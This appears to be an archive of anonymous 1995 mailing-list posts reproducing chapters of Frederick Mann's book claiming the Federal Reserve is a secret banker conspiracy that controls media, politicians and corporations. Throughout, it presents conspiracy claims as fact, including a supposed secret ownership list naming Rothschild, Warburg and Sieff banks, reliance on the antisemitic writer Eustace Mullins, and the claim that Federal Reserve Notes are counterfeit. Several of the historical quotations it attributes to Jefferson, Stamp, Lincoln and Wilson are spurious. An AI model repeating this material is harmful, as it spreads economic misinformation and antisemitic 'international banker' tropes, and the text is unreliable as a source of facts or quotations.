debt-currency economic system by which they rob and rule. Our people have become tenants and "debt-slaves" to the bankers and their agents in the land our fathers conquered. It is conquest through the most gigantic fraud and swindle in the history of humankind. And we remind you again: The key to their wealth and power over us is their MONOPOLISTIC ability to "create" currency out of nothing and to lend it to us at interest. If Congress had not allowed them to do that, they never would have gained secret control over our nation. CONTROLLED NEWS AND INFORMATION This currency-lender conspiracy ("consPIRACY") is as old as Babylon. Even in America it dates far back before 1913. Actually, 1913 was the year in which the way opened for complete economic conquest of our peo- ple. The conspiracy is old enough to America so that the system's agents have been for many years in positions such as newspaper publishers, edit- tors, columnists, church ministers, university presidents, professors, textbook authors, attorneys, accountants, labor union leaders, movie mak- ers, radio and TV commentators, politicians from school board members to U.S. Presidents, and many others. These agents control the information available to our people. They manipulate public opinion, elect who they will locally and nationally, and never expose the crooked currency system. They promote school bonds, municipal bonds, expensive and detrimental farm programs, "urban renew- al," "foreign aid," and many other schemes which will put the people more in debt to the bankers. Thoughtful citizens wonder why billions are spent on one program and billions on another which may duplicate or even null- ify it, such as paying some farmers not to raise crops, while at the same time building dams or canals to irrigate more farm land. Crazy or stupid? Neither. The goal is more debt. Thousands of government-sponsored ways to waste "money" are perpetrated continually. Most make no sense, but they are never exposed for what they really are: builders of billions for the bankers and debts for the people. So-called "economic experts" write syndicated columns in hundreds of newspapers, craftily designed to prevent the people from learning the simple truth about our debt-currency system. Commentators on radio and TV, educators, and politicians blame the people as wasteful, lazy, or spendthrift, and blame the workers and consumers for the increase in debts and the inflation of prices, when they really know that the basic cause is the debt-currency system itself. Our people are drowned in char- ges and counter-charges designed to confuse them and keep them from under- standing the evil currency system that so silently robs the workers, farm- ers, and business people of the fruit of their labor. And, increasingly, the system is being used to rob us of our rights and freedoms, supposedly guaranteed by the U.S. Constitution. In his book INVENTING REALITY, Michael Parenti wrote: "Ten business and financial corporations control the three major tele- vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat- ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59 magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub- lishers and various motion picture companies like Columbia Pictures and Twentieth Century Fox. Three quarters of the major stockholders of ABC, CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust, Citibank, and Bank of America. The overall pattern is one of increasing concentration of ownership and earnings. According to a 1982 LOS ANGLEES TIMES survey, independent daily newspapers are being gobbled up by the chains at the rate of fifty or sixty a year. Ten newspaper chains earn over half of all newspaper rev- enue in this country. Five media conglomerates share 95 percent of the record and tapes market with Warner and CBS alone controlling 65 percent of the market. Eight Hollywood studios account for 89 percent of U.S. feature film rentals. Three television networks earn over two-thirds of total U.S. television revenues. Seven paperback publishers dominate the mass market for books... While having an abundance of numbers and giving an appearance of di- versity, the mass media actually are highly centralized outlets that proffer a remarkably homogenized fare. New services for dailies through- out the entire nation are provided by the Associated Press and United Press International (which may soon merge with AP or go under), The New York Times-Washington Post wire services, and several foreign wire ser- vices like Reuters. The ideological viewpoint of these news conduits are pretty much the same, marked by prefabricated standardization of news which is constricting and frightening." In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes: "The power to control information is a major lever in the control of society. Giving citizens a choice in ideas and information is as impor- tant as giving them a choice in politics. If a nation has narrowly con- trolled information it will soon have narrowly controlled politics." When a few informed and concerned people or organizations who know the truth begin to expose the bankers and their agents, or try to stop any of their mad schemes, the messengers are ridiculed and smeared as "right- wing extremists," "super-patriots," "bigots," "racists," "facists," or "antisemites." Any name is used to discredit them, and to stop other peo- ple from listening. Books and articles such as you are now reading are kept out of schools, libraries, and book stores. Some, who are especially vocal in their exposure of the treason com- mitted against our people, are harassed by government agencies such as the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank- ruptcy. Sometimes their businesses and homes are violently raided at gun- point, and their money, currency, equipment, and records confiscated, so it is very difficult, if at all possible to continue their business. In Chapter One the National Commodity and Barter Association was mentioned as an example of such raids. But the most striking case has been that of Ezra Pound, which is covered below. Using these methods, the Federal Reserve bankers and their agents have been completely successful in preventing most Americans from learning the things you are reading in this report. However, in spite of their control of information, they realize that more and more citizens are learning the truth. Therefore, to prevent retaliation and armed resistance to their plunder of America, they plan to register all firearms and eventually disarm all citizens. They want to eliminate all guns not in the hands of their government police or army. Our wise Founding Fathers wrote the Se- cond Amendment to the Constitution so that the people could protect them- selves against the government. Love of life, interest in your freedom, compassion for humanity, con- cern for your children, and the safety of all you have worked for should make you deeply interested in this, America's greatest problem. Our gener- ation has not suffered under the bankers' yoke as the coming generations will. Usury and taxes will continue to take a larger and larger part of the earnings of the people and put them deeper into the pockets of the bankers and their agents. Increasing "government" regulations will prevent citizen protest and opposition to their control. Is it possible that your grand- children will own neither car nor home, but will live in "government- owned" apratments and ride to work in "government-owned" buses, and be allowed to keep just enough of their earnings to buy a minimum of food and clothing, while their rulers wallow in luxury? In Asia and Eastern Europe this used to be called communism. In America it is called democracy or capitalism. Horace Greeley stated, "While boasting of our noble deeds, we are careful to conceal the ugly fact that by an iniquitious currency system we have nationalized a system of oppression which, though more refined, is no less cruel than the old system of chattel slavery." THE CASE OF EZRA POUND Ezra Pound was a poet, one of America's greatest - if not the great- est. He played a major role in the development of writers and poets, such as E.E. Cummings, T.S. Elliot, Robert Frost, Ernest Hemingway, James Joyce, and William Carlos Williams. He also studied politics, economics, banking, and monetary theory. He disapproved of war. During World War II, he hid a number of Jews from the Nazi exterminators; if discovered the penalty would have been death. He broadcast a series of talks on Italian radio aimed at Americans. He had wanted America to stay out of the war, and he said some uncomplimentary things about President Franklin D. Roosevelt. He also stated some of his political and monetary ideas. He was accused of being a traitor. At the end of the war he was imprisoned in an American concentration camp near Pisa, Italy for six months without trial. Then he was transferred to America where he was declared insane and imprisoned in a mental hospital in Washington D.C. for thirteen years. After which the treason charges, for which he had never stood trial, were dropped, and he was released. He returned to Italy, where he lived until his death in 1972. The reason he was not tried seems to be that his prosecutors didn't have a case that would hold up in court and/or they were afraid that he would repeat in court what he had said over the radio in Italy. Wendell Muncie, M.D., one of the psychiatrists involved in his "sanity hearing," said that Pound's insanity consisted of three factors: his passion for the U.S. Constitution, his espousal of the Confucian ethic, and his desire for world peace. No formal diagnosis of Pound's supposed "insanity" has been found. His captors in Washington openly admitted that Pound was a polit- ical prisoner. A Congressional investigation started in 1957 and completed in 1958 exposed the inadequacy of the case against Pound and led to his release. Here are some extracts from Pound's radio talks: . "I think an alliance with Stalin's Russia is rotten." (January 29,1942) ."Liberty is not a right but a duty." (March 8, 1942) ."Sovereignty inheres in the right to issue money. And the American sov- ereignty belongs by right to the people, and their representatives in Congress have the right to issue money and to determine the value thereof. And 120 million, 120 million suckers have lamentably failed to insist on the obeservation of this quite decided law.... Now the point at which em- bezzlement of the nation's funds on the part of her officers becomes trea- son can probably be decided only by jurists, and not by hand-picked judges who support illegality." (April 9, 1942) .Quotes read by Pound: 1. "'I believe that banking institutions are more dangerous to our liberties than standing armies.' - Thomas Jefferson. 2. 'I have two great enemies, the southern army in front of me and the financial institutions in the rear. Of the two, the one in the rear is the greatest enemy.' - Abraham Lincoln. 3. 'The money power preys upon the nation in times of peace and conspires against it in times of adversity. It is more despotic than monarchy, more insolent than autocracy, more selfish than bureaucracy; it denounces as public enemies all who question its methods, or throw light upon its crimes.' - William Jennings Bryan." (July 26, 1942) .Back to Pound's own words: "Wars in old times were made to get slaves. The modern implement of imposing slavery is debt." (March 25, 1943) ."The phase of the usury system which we are trying to analyze is more or less Patterson''s perception that the Bank of England could have benefit of all the interest on all the money that it creates out of nothing.... Now the American citizen can, of course, appeal to his constitution, which states that Congress shall have power to coin money or regulate the value thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30, 1943) ."That text is known to them that have the patience to read it, possibly one-hundredth of one percent of the denizens. They forget it, all save a few Western states. I think somebody in Dakota once read it. The Consti- tution." June 30, 1943) THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONALAND ILLEGAL Although there has never been a court case that challenged the legal- ity of the Federal Reserve System, there was a challenge to the National Recovery Act or NRA, which has ruled unconstitutional. The U.S. Supreme Court - Schechter Poultry v. U.S.,29 U.S.495, 55 U.S. 837.842 (1935) - ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI- MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value there- of..." By passing the Federal Reserve Act, Congress abdicated and trans- ferred to the Federal Reserve bankers its constitutionally legitimate function of issuing and controlling money. If the Supreme Court ruling on the NRA is applied to the Federal Reserve System, the unconstitutionality and illegality of the Fed becomes obvious. TELL THE PEOPLE America will not shake off her illegal banker-controlled dictatorship as long as the people are ignorant of the hidden controllers. Interna- tional bankers, who control most of the governments of the nations and most sources of information, seem to have us completely in their grasp. They are afraid of only one thing: an awakened citizenry armed with the truth. An ignorant citizen is the banker-government's best "client." An informed citizen is the banker-government's worst nightmare. Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At- lanta Georgia, said: "This is a staggering thought. We are completely dependent on the com- mercial banks. Someone has to borrow every dollar we have in circulation, cash, or credit. If the banks create ample synthetic money, we are pros- perous; if not, we starve. We are absolutely without a permanent money system. When one gets a complete grasp of the picture, the tragic absur- dity of our hopeless position is almost incredible, but there it is. It is the most important subject intelligent persons can investigate and re- flect upon. It is so important that our present civilization may collapse unless it becomes widely understood and the defect remedied very soon." PRIVATE BANKING In California a very private "non-bank" has been operating successfully for fifteen years. It caters for accounts in gold or Federal Reserve Notes. It is completely private and doesn't report to anyone. It pays in- terest on both gold and Federal Reserve Note balances. Ideally, we need to establish a network of private banks throughout the country, and even- tually throughout the rest of the world. See Chapter Twelve. From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:11:31 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 27 Sep 95 23:11:31 PDT Subject: No Subject Message-ID: <199509280611.HAA02217@utopia.hacktic.nl> This is the best description of debt currency I've seen. Debt currency is today's most effective form of slavery. It is today's American slavery. The text is from the book: THE ECONOMIC RAPE OF AMERICA WHAT YOU CAN DO ABOUT IT by Frederick Mann of Terra Libra The book costs $19.95 plus $2 postage and handling. It can be ordered from: Terra Libra 2430 E. Roosevelt #998 Phoenix, Az 85008 CHAPTER THREE THE FEDERAL RESERVE BANKERS Then Jesus entered the temple and drove out all who were selling and buy- ing in the temple, and he overturned the tables of the money changers and the seats of those who sold doves. He said to them, "It is written, 'My house shall be called a house of prayer'; but you are making it a den of robbers." Matthew 21, verses 12-13 "All of the perplexities, confusion, and distress in America arises, not from the defects of the Constitution or Confederation, not from want of honor or virtue, so much as from downright ignorance of the nature of coin, credit, and circulation." John Adams, Founding Father (In a letter to Thomas Jefferson, 1787) Congressman Louis T. McFadden said the following during a speech before Congress on June 10, 1932: "Mr. Cairman, we have in this country one of the most corrupt institut- ions the world has ever know. I refer to the Federal Reserve Board and the Federal Reserve Banks. The Federal Reserve Board, a government board, has cheated the Government of the United States and the people of the United States out of enough money to pay the national debt. The depredations and the iniquities of the Federal Reserve Board and the Federal Reserve banks acting togeather have cost this country enough money to pay the national debt several times over. This evil institution has impoverished and ruined the people of the United States; has bankrupted itself, and has practi- cally bankrupted our government. It has done this through the defects of the law under which it operates, through the maladministration of that law by the Federal Reserve Board, and through the corrupt practices of the moneyed vultures who control it. Some people think the Federal Reserve banks are United States Government institutions. They are not government institutions. They are private cre- dit monopolies which prey upon the people of the United States for the benefit of themselves and their foreign swindlers; and rich and predatory money lenders. In that dark crew of financial pirates there are those who would cut a man's throat to get a dollar out of his pocket; there are those who send money into states to buy votes to control our legislation; and there are those who maintain an international propaganda for the pur- pose of deceiving us and wheedling us into the granting of new concessions which will permit them to cover up their past misdeeds and set again in motion their gigantic train of crime." PERVASIVE MONEY PROBLEMS IN AMERICA Americans, living in "the richest nation on earth," always seem to be short of money. Women are working in unprecedented numbers, men hope for overtime hours to earn more. Many take parttime jobs evenings and week- ends. Children look for odd jobs to earn spending money. But the family debt climbs higher. And psychologists say one of the biggest causes of family quarrels and breakups is "arguments over money." Much of this trouble can be can be traced to our "counterfeit money" system, which leaves government free to perpetrate the most destructive monetary and economic crimes. On the national scale, in just ten years the federal debt has grown from less than on trillion dollars to over four trillion. (In Chapter Nine we will discover that the real national debt is much biggger.) The annual interest on that debt is over $250 billion. And now we are told (not ask- ed) that we must come up with between $200 billion and $500 billion to "save" the S & L institutions. All this for only one reason: to protect and perpetuate a fundamentally flawed system whose only object is to en- rich and empower the Federal Reserve bankers who own and operate the sys- tem. During the last few years America has become by far the largest debtor nation of the world. And our politicians have made their "contributions" with boundless "generosity!" John Danforth, Republican senator from Miss- ouri, was reported in the Arizona Republic of April 21, 1992 as follows: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been ac- complices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have de- frauded our country to get ourselves elected." PAPER CURRENCY CAN BE A VERY PROFITABLE HUMAN CREATION Economists use the word "create" when speaking of the process by which paper currency comes into existence. "Creation" means making something that did not exist before. Lumbermen make boards from trees, workers build houses from lumber, and factories manufacture automobiles from metal, glass, and other materials. But in all these cases they did not CREATE. They only changed existing materials into more usable and more valuable forms. Not so with currency. Here we actually CREATE something out of nothing. A piece of paper of little value is printed so it becomes worth a piece of lumber. That difference in value is literally CREATED out of nothing. And with different numbers printed on the piece of paper, it can buy the automobile or even the house. The VALUE of the paper has been CREATED in the true sense of the word. Paper currency can be created honestly or fraudulently. Gold and silver certificates, being receipts for gold and silver, with a guarantee to pay the bearer on demand, are honest paper currency. Federal Reserve Notes currently in circulation constitute fraudulent, counterfeit paper curr- ency. Counterfeit paper currency is very cheap to "create," and whoever prints it makes a huge profit! Builders work hard to make a profit of 5% above their cost in building a house. Auto makers sell their cars 1% to 2% above the cost of manufacture, which is considered good business. But counterfeit paper currency "manufacturers" have no limit on their profits since a few cents will print a $1 bill, a $100 bill, or even a $10,000 bill. THE DANGER OF A MONOPOLISTIC CENTRAL BANK Thomas Jefferson understood the danger of putting the power to control the currency of a nation in the hands of a few individuals in the form of a MONOPOLISTIC central bank. This is why he opposed Alexander Hamilton's scheme to establish the First Bank of the United States. Let me repeat what he said in 1791: "If the American people ever allow the banks to control issuance of their currency, first by inflation and then by deflation, the banks and corporations that grow up around them will deprive the people of all pro- perty until their children will wake up homeless on the continent their fathers occupied." President Andrew Jackson also understood the danger. He refused to re- new the charter (a grant of MONOPOLY) of the Second Bank of the United States. In 1836 Jackson said to the bankers trying to persuade him to re- new their charter (so they could continue their harmful MONOPOLY): "You are a den of vipers. I intend to rout you out and by the Eternal God I will rout you out. If the people only understood the rank injustice of our money and banking system, there would be a revolution before morn- ing." On December 22, 1913, the day before President Woodrow Wilson signed the Federal Reserve Act, Congressman Charles A. Lindberg Sr. (father of the famous aviator) said to the House: "This Act establishes the most gigantic trust [*] on earth. When the President signs this bill, the invisible government by the Monetary Power will be legalized. The people may not know it immediately, but the day of reckoning is only a few years removed. The trusts [*] will soon realize that they have gone too far even for their own good. The people must make a declaration of independence to relieve themselves from the Monetary Power. This they will be able to do by taking control of Congress. Wall Streeters could not cheat us if you Senators and Representatives did not make a humbug of Congress... The greatest crime of congress is its curr- ency system. The worst legislative crime of the ages is perpetrated by this banking bill. The caucus and the party bosses have again operated and prevented the people from getting the benefit of their own government." [* At that time the word "trust" was synonymous with "MONOPOLY."] THE DEPRESSION OF THE 1930s In 1930 America did not lack industrial capacity, fertile farmland, skilled or willing workers, or industrious families. It had an extensive and highly efficient transportation system in railroads, road networks, and inland and ocean waterways. Communications between regions and local- ities were the best in the world, utilizing telephone, teletype, radio, and a well-operated mail system. No war had ravaged the cities or the countryside, no pestilence weakened the population, nor had famine stalked the land. In AMERICA'S GREAT DEPRESSION, Murray N. Rothbard, Professor of Eco- nomics at the University of Nevada, Las Vegas, describes how the creation of the Federal Reserve System increased the bankers' ability to inflate the currency supply sixfold. During 1923 to 1929 the bankers did inflate the currency suppy enormously. Such an artificial inflation inevitably brings about a subsequent need for deflation. Federal Reserve bankers, the source of America's currency and credit, reduced the currency supply by refusing loans to stable and growing industries, stores, and farmers. At the same time they demanded payment on existing loans. They also increased interest rates. Currency was rapidly taken out of circulation and was not replaced. America was put in a depression and in deep trouble. Goods were available to be purchased, jobs waiting to be done, but little currency was available. Twenty-five percent of workers were laid off. Banks took possession of tens of thousands of farms and businesses through foreclo- sure. Gloom settled over America. The contraction of the currency supply caused the stock market to collapse and the ensuing depression. Seven months before the collase, Paul Warburg, the main architect of the Federal Reserve System, in his annual report to the stockholders of his International Acceptance Bank, wrote: "If the orgies of unrestrained speculation are permitted to spread, the ultimate collapse is certain not only to affect the speculators themselves, but to bring about a general depression involving the entire country." Both the inflation and the deflation, causing the depression, had been planned - as predicted by Jefferson in 1791! CURRENCY INFLATION ENDED THE "GREAT DEPRESSION" The depression lasted until 1939, when the Federal Reserve System began to send large amounts of currency into circulation for military prepared- ness. As soon as the currency supply went up, people were hired back to work, farms sold their produce instead of plowing it under, mines reopen- ed, factories began to hum, both industrial and residential construction began anew, and the "Great Depression" was over. Some politicians were blamed for it and others took credit for ending it. The truth was that bankers caused it and bankers ended it. The people were never told that simple truth. The bankers who "manufacture" and "control" our currency have used their huge profits to "buy" our politicians, and ultimately to control our government. POWER TO COIN AND REGULATE MONEY When we see the disastrous results of an artificially created shortage of currency, we can better understand why our Founding Fathers insisted on placing the power to create and control money in the hands of Congress. Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But in 1913 Congress passed the "Federal Reserve Act," relinquishing the power to create and control money to the Federal Reserve Corporation, a private company owned and controlled by bankers. The word "Federal" was used only to deceive the people. The term "central bank" was carefully a- voided. The Federal Reserve Act created a Board of Directors, the Federal Reserve Board, to run the Federal Reserve Corportaion with a MONOPOLY to create and control the currency of the United States. This infamous legislation was acompanied with appropriate fanfare and propaganda that it would "remove money from politics" and "prevent boom and bust from hurting our citizens." The people were not told then, and still do not know today, that the Federal Reserve Corporation is a private MONO- POLY controlled by bankers, operated for the financial gain of the bankers at the expense of the people. Since that day of infamy a small group of privileged people who lend us "our money," have accrued to themselves all of the profits of printing paper currency - and more! Since 1913 they have created trillions of dol- lars in currency and credit, which as their own personal property, they then lent to our government and our people, with interest. "The rich get richer and the poor get poorer" had become the secret policy of our nat- ional government. The main architect of the Federal Reserve System was Paul Moritz War- burg, who came from a famous German banking family. The kingpin who steer- ed the Federal Reserve Act through Congress was Senator Nelson Aldrich, Chairman fo the Finance Committee. He was the maternal grandfather of Nel- son A. Rockefeller, of Standard Oil and Chase Manhattan Bank. Aldrich's daughter, Abby Greene Aldrich, married John D. Rockerfeller, Jr. in 1901. At the time, many people regarded Senator Aldrich as the Rockefeller fam- ily's mouthpiece in the Senate. The Federal Reserve Act was passed during the presidency of Woodrow Wilson. Just before he died Wilson is reported to have said that he had been deceived and "I have betrayed my country." He also said: "A great industrial nation is controlled by its system of credit. Our system of credit has been concentrated. The growth of the nation and all our activities are in the hands of a few men. We have come to be one of the worst ruled, one of the most completely controlled and dominated gov- ernments in the world - no longer a government of free opinion, no longer a government by conviction and vote of the majority, but a government by the opinion and duress of small groups of dominant men." WHO OWNS THE FEDERAL RESERVE? There has been much speculation about who owns the Federal Reserve Cor- poration. It has been one of the best kept secrets of the century, because the Federal Reserve Act of 1913 provided that the names of the owner banks be kept secret. However, R.E. McMaster publisher of the newsletter THE REAPER, asked his Swiss banking contacts which banks hold the controlling stock in the Federal Reserve Corporation. The answer: 1. Rothschild Banks of London and Berlin 2. Lazard Brothers Bank of Paris 3. Israel Moses Sieff Banks of Italy 4. Warburg Bank of Hamburg and Amsterdam 5. Lehman Brothers Bank of New York 6. Kuhn Loeb Bank of New York 7. Chase manhattan Bank of New York 8. Goldman Sachs Bank of New York. In THE SECRETS OF THE FEDERAL RESERVE, Eustace Mullins indicates that, because the Federal Reserve Bank of New York sets interest rates and con- trols the daily supply and price of currency throughout the U.S., the owners of that bank are the real directors of the entire system. Mullins states: "The shareholders of these banks which own the stock of the Federal Reserve Bank of New York are the people who have controlled our political and economic destinies since 1914. They are the Rothschilds, Lazard Freres (Eugene Mayer), Israel Sieff, Kuhn Loeb company, Warburg Company, Lehman Brothers, Goldman Sachs, the Rockefeller family, and the J.P. Morgan in- terests." THEY PRINT IT - WE BORROW IT AND PAY THEM INTEREST An example of the process of currency creation and its conversion into "people's debt" will aid our understanding. The Federal Government, having spent more than it has taken from its citizens in taxes, needs (for the sake of illustration) $1 billion. Since it does not have the currency, and Congress has given away its authority to create it, the government must go to the creators for the $1 billion. But the Federal Reserve, a private corporation, does not give its currency away for free! The bankers are willing to deliver $1 billion in currency or credit to the federal government in exchange for the government's agreement to pay it back with interest. So Congress authorizes the Treasury Department to print $1 billion in U.S. Bonds, which are then delivered to the Federal Reserve bankers. (The bonds are a kind of "IOU" that bears interest.) The U.S Treasury prints $1 billion in bank notes. The printing cost is about $20.62 per 1,000 bills - it costs the same irrespective of the de- nomination - the cost of printing a $1 note is about the same as for a $100 note: about .0206 cents. The Federal Reserve "buys" these bills from the U.S. Treasury, paying only for the printing costs. The bills are then exchanged at full face value for the bonds. The government uses the curr- ency to pay its obligations. What are the results of this fantastic trans- action? Well, the government's bills are paid all right, but the U.S. Gov- ernment has now indebted the people to the Federal Reserve bankers for $1 billion plus interest! Since this process has been going on since 1913, the people are now indebted to the bankers to the tune of trillions of dollars. The people are taxed billions of dollars each month just to pay the interest on this "national debt." With both the principal and the interest climbing every month, there is no hope of ever paying off this "debt." The working people of the United States now "owe" the approximately 300 banking families and their consorts more than the assessed value of all the assets in the United States. And realize, the bankers got all this for the cost of paper, ink, and bookkeeping! THE MOUNTAIN OF DEBT You say this is terrible! Yes it is, but this is only part of the sordid story. Under this "debt-currency" system, those U.S. Bonds referred to above have now become assets of the banks, called their "reserve." Regular commercial banks use these assets to issue loans to individual and commercial customers. Since the banking laws require only about a 12% reserve, this means the banking faternity can lend up to eight times the amount of the bonds they have on hand. As a result of the $1 billion discussed here, they can lend $8 billion to private customers at inter- est. This means that together with the $1 billion lent to the government, the bankers can lend out $9 billion at interest for the original cost to them of about $400,000 for the printing! And because the Federal Reserve bankers have been granted a MONOPOLY, the only way our people and bus- inesses can get currency to carry on trade and expand industry and farm- ing is to borrow it from the bankers! USING DEBT TO EXPAND CONTROL In addition to the vast wealth drawn to them through this almost un- limited usury, the bankers who control the currency are able to approve or disapprove large loans to big and successful corporations. Bankers can refuse a loan, thereby depressing the price of a corporation's shares on the stock exchange. This enables the bankers' agents to buy large blocks of the shares at depressed prices. Then they can approve a multi-million dollar loan to the corporation, resulting in its share price rising, allowing the bankers' agents to sell the shares, sometimes making huge profits. In this manner billions of dollars are made to buy even more shares. Using this method since 1913, the bankers and their agents have pur- chased secret or open control of almost every large corporation in Amer- ica. Using that control, they force the corporations to borrow huge sums from their banks so that corporate earnings are partially siphoned off in the form of interest paid to the banks. This leaves little "actual profit" to be paid out as dividends. When bankers lend more, the currency supply expands. When they reign in the loans, the currency supply contracts. By expanding or contracting the currency supply, the bankers can make the stock market go up or down at their pockets' content! They can cause "busts and booms" almost as they wish. That is why President James A. Garfield said, "Whoever controls the volume of money in any country is absolute master of all industry and commerce." At the time of writing (July, 1992), the New York stock market has been hovering around record highs for months, while the economy continues to suffer a protracted slump. The bankers no doubt want the stock mar- ket to be high and the economy to recover before the coming presidential election. Keep in mind that they endorse all three presidential candi- dates. Tweedledum and Tweedledee; or Louie, Huey, and Dewey; or Larry, Mo, and Curly - they are all in the hands of the bankers. WHY LOANS EVENTUALLY SHRINK THE CURRENCY SUPPLY The only way new currency goes into circulation in America under this wicked system is when someone borrows it from a banker. When people are confident of success, they borrow more currency, which increases the currency supply, and all seem to prosper for a while. Then, as they pay off their loans, the available currency supply shrinks and currency be- comes "scarce." Borrowers must always take more currency out of circu- lation when they repay their loans, than they put in circulation when they receive their loans. Interest and charges make the repayment total larger than the loan. This means that only more people borrowing still more can keep the medium of exchange available to the nation. This example may aid understanding. When a citizen goes to a banker to borrow $100,000 to purchase a home or a farm, and the loan is granted, the banker gives the borrower a check for $100,000 or credits the borrow- er's account with $100,000. The borrower, in turn, writes the necessary checks to the builder, seller, subcontractors, etc. (who, in turn, write more checks), thereby putting $100,000 of "checkbook currency" into cir- culation. However, on a 30-year mortgage with 10% interest, the banker wants $828 per month, or a total of $316,080. The buyer must take that $316,080 out of circulation, reducing the overall amount in circulation by $216,080. The banker has not really produced anything of value, except the slip of paper called a check or deposit slip. Yet the banker ends up having $216,080 more than he had before, minus a few hundred dollars of clerical and office costs. But the people, as a whole, have $216,080 less. WHY SMALL LOANS HAVE THE SAME EFFECT For those who haven't aquite grasped the impact, let us consider an auto loan for only three years. Step one: citizen borrows $6,000 and pays it into circulation (to the dealer, factory, etc.). Citizen agrees to re- pay the banker $7,200. Step two: Citizen pays $200 per month. In 36 months citizen has taken $7,200 out of circulation and paid it to the bank. Net result? $1,200 less currency in circulation. Since currency requirements increase with expanding population, in- dustry, and commerce, and paying off any loan decreases the available currency supply, it is clear that we would quickly run out of currency, unless more and more people borrow more and more currency to keep curr- ency in circulation! Multiply the above examples by hundreds of millions of times since 1913, and you can see why America has fallen from a prosperous debt-free nation to the most debt-ridden country in the world. Practically every home, farm, and business is heavily mortgaged to the bankers. Practically all our cars, furniture, and clothes are purchased with borrowed currency. The interest to the bankers on personal, state, and federal debt totals more than 25% of the combined earnings of the working population! THE COST TO THE BANKERS? PRACTICALLY NOTHING In the tens of millions of transactions made each year like those shown here, relatively few bank notes change hands, nor is it necessary From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:11:38 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 27 Sep 95 23:11:38 PDT Subject: No Subject Message-ID: <199509280611.HAA02220@utopia.hacktic.nl> that they do. 95% of all "cash" transactions in the U.S. are by check. Checks are thus effectively also currency. The banker creates the so- called "loan" by writing a check or deposit slip, not against actual money, but against your promise to pay back the loan. The only cost to the bank is the paper,ink, and a few dollars in salaries and office costs for each tansaction. It is "check-kiting" on an enormous scale! The profits are enormous as shown below. THE COST TO YOU? PRACTICALLY EVERYTHING In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen. State and local debts were practically non-existent, and government was small and not oppressive. By 1920, after only six years of the Federal Reserve handling our currency, the federal debt had jumped to $24 billion - $228 per citizen. The Federal Government began to grow like an invisible cancer in its ear- ly stages. By 1968 the federal debt had jumped to $347 billion - $1,717 per cit- izen. Ten years later, by 1978 it had doubled again to $763 billion - $3,500 per citizen. That is a debt of $17,500 for every family of five in America. Federal debt has been growing faster and faster since. And the Federal Government has become a debilitating cancer rapidly sapping and weakening its victim. Today in 1992 the federal debt is over $4 trillion. (And they "cook the books" on the low side to come up with that figure - see Chapter Nine.) The $4 trillion national debt amounts to $16,000 per citizen, or $80,000 per family of five. And if that debt were calculated in terms of working or tax-paying families, it would be considerably higher. The Federal Gov- ernment has become a bloated, out-of-control parasite, a terminal cancer. The economy seems so weak that even after many months of blowing up the currency supply, signs of recovery have to be searched for. The entire system may be on the brink of complete collapse. The above figures do not include state, municipal, school district, business, or personal debts, which total an additional $3 trillion. Total debt in America is thus over $7 trillion - $28,000 per citizen - $120,000 per family of five. This is more than twice the assessed value of all the land and buildings in America. Effectively all of America has been signed over to the bankers. They can take America and we would still owe them another America! Of course, it is to their advantage not to take actual title to the property, so we will not realize that we really own nothing. Instead they leave us with "ownership" so we will willingly continue to work and pay ever higher tributes to the bankers. What we really have is national bankruptcy. Let me repeat the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs.. I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this won- derful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected." THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS To grasp the fact that periodic withdrawal of currency through interest payments to the bankers will inexorably transfer all wealth in the nation to the receivers of interest, imagine yourself in a poker or dice game. Everyone has to buy chips (the medium of exchange) from a "banker" who does not risk chips in the game, but watches the table and every hour rea- ches in and takes 10% to 15% of all the chips on the table. As the game progresses, the number of chips in the possession of each player will go up and down with his or her "luck." However, the total number of chips available to play the game (carry on business and trade) will decrease steadily, while the "banker's" mountain of chips just grows and grows. The game will get low on chips, and some players will run out. If they want to continue to play, they must buy or borrow more chips from the "banker." The "banker" will sell (lend) the player more chips only if the player signs a "mortgage" agreeing to give the "banker" some real pro- perty (car, home, farm, business, etc.). If the payments should go into default, the banker takes the property. The payments must be made on time, whether the player wins (makes a profit) or not. It is easy to see that no matter how skillfully the players play, eventually the "banker" will end up with all of his chips back. Except for the very best or "luckiest" players, the rest, if they stay in the game long enough, will end up owing to the "banker" their cars, their homes, their farms, their businesses, and perhaps even their watches, rings, and the shirts off their backs! Sir Josiah Stamp, President of the Bank of England in the 1920s, and the second richest man in Britain at the time, said: "Banking was conceived in iniquity and was born in sin. The bankers own the earth. Take it away from them but leave them in power to create deposits, and with the flick of the pen they create enough deposits to buy it back again. However, take it away from them, and all the great fortunes like mine will disappear, and they ought to disappear, for this would be a happier and better world to live in. But, if you wish to re- main the slaves of bankers and pay the cost of your own slavery, let them continue to create deposits." Our real-life situation is much worse than any poker game. In a poker game no one is forced to go into debt, and anyone can quit at any time and keep whatever he or she still has. But in real life, even if we borrow little ourselves from the bankers, the local, state, and federal govern- ments borrow billions in our name, squander it, then confiscate our earn- ings from us and pay it to the bankers with interest. We are forced to play their game, and it seems we can only leave the game by dying. We pay as long as we live, and our childern pay after we die. If we cannot pay, the same government sends the police to take our property and 